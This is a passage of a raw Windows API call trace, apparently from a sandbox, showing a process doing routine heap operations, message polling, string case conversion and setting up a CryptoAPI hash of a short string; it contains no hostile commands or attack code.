Size=0x4) returned 0x2a71a48 [0112.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa360 [0112.654] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0112.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa318 [0112.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0112.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0112.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa300 [0112.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa318 | out: hHeap=0x2af0000) returned 1 [0112.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0112.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0112.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0112.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa450 [0112.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0112.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa390 [0112.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0112.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0112.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4f8 [0112.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa390 | out: hHeap=0x2af0000) returned 1 [0112.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0112.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4f8 | out: hHeap=0x2af0000) returned 1 [0112.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0112.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0112.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa408 [0112.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0112.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0112.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa378 [0112.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa408 | out: hHeap=0x2af0000) returned 1 [0112.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0112.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa378 | out: hHeap=0x2af0000) returned 1 [0112.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0112.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0112.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa288 [0112.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0112.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0112.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4e0 [0112.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa288 | out: hHeap=0x2af0000) returned 1 [0112.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0112.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4e0 | out: hHeap=0x2af0000) returned 1 [0112.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0112.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0112.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa510 [0112.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0112.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0112.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa318 [0112.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa510 | out: hHeap=0x2af0000) returned 1 [0112.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0112.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa318 | out: hHeap=0x2af0000) returned 1 [0112.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0112.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0112.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa450 | out: hHeap=0x2af0000) returned 1 [0112.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0112.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2b8 [0112.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0112.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0112.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2d0 [0112.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2b8 | out: hHeap=0x2af0000) returned 1 [0112.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0112.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2d0 | out: hHeap=0x2af0000) returned 1 [0112.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0112.656] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0112.656] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f7120, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0112.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa420 | out: hHeap=0x2af0000) returned 1 [0112.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7120 | out: hHeap=0x2af0000) returned 1 [0112.656] GetProcAddress (hModule=0x76390000, lpProcName="CryptAcquireContext") returned 0x0 [0112.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0112.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0112.657] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0112.657] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f71a0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0112.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa498 | out: hHeap=0x2af0000) returned 1 [0112.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71a0 | out: hHeap=0x2af0000) returned 1 [0112.657] GetProcAddress (hModule=0x76390000, lpProcName="CryptAcquireContextA") returned 0x763afc40 [0112.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0112.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0112.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa66f0 | out: hHeap=0x2af0000) returned 1 [0112.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0112.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0112.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0112.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0112.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0112.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0112.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7180 | out: hHeap=0x2af0000) returned 1 [0112.657] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0x9bf330) returned 1 [0112.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0112.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0112.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4e0 | out: hHeap=0x2af0000) returned 1 [0112.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0112.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0112.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3a8 | out: hHeap=0x2af0000) returned 1 [0112.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa330 | out: hHeap=0x2af0000) returned 1 [0112.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0112.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4b0 | out: hHeap=0x2af0000) returned 1 [0112.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3f0 | out: hHeap=0x2af0000) returned 1 [0112.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0112.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4e0 | out: hHeap=0x2af0000) returned 1 [0112.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3a8 | out: hHeap=0x2af0000) returned 1 [0112.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0112.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa258 | out: hHeap=0x2af0000) returned 1 [0112.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa348 | out: hHeap=0x2af0000) returned 1 [0112.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0112.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0112.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0112.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0112.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0112.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0112.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0112.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0112.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa360 | out: hHeap=0x2af0000) returned 1 [0112.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0112.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0112.659] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0112.659] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0112.659] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0112.659] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0112.659] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0112.659] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0112.659] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0112.659] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0112.659] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0112.659] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0112.659] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0112.659] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0112.659] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0112.659] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0112.660] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0112.660] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0112.660] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0112.660] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0112.660] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0112.660] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0112.660] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0112.660] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0112.660] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0112.660] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0112.660] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0112.660] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0112.660] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0112.660] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0112.660] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0112.660] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0112.660] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0112.660] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0112.660] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0112.660] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0112.660] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0112.660] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0112.660] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0112.661] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0112.661] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0112.661] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0112.661] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0112.661] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0112.661] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0112.661] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0112.661] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0112.661] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0112.661] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0112.661] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0112.661] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0112.661] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0112.661] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0112.661] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0112.661] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0112.661] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0112.661] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0112.661] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0112.661] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0112.661] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0112.661] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0112.661] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0112.662] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0112.662] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0112.662] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0112.662] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0112.662] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aaa468, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0112.662] CryptCreateHash (in: hProv=0x9bf330, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0112.662] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0112.662] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0112.662] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0112.662] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0112.662] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0112.662] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71ce8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0112.662] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0112.662] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0112.662] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0112.662] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71cc8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0112.662] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0112.663] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0112.663] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, 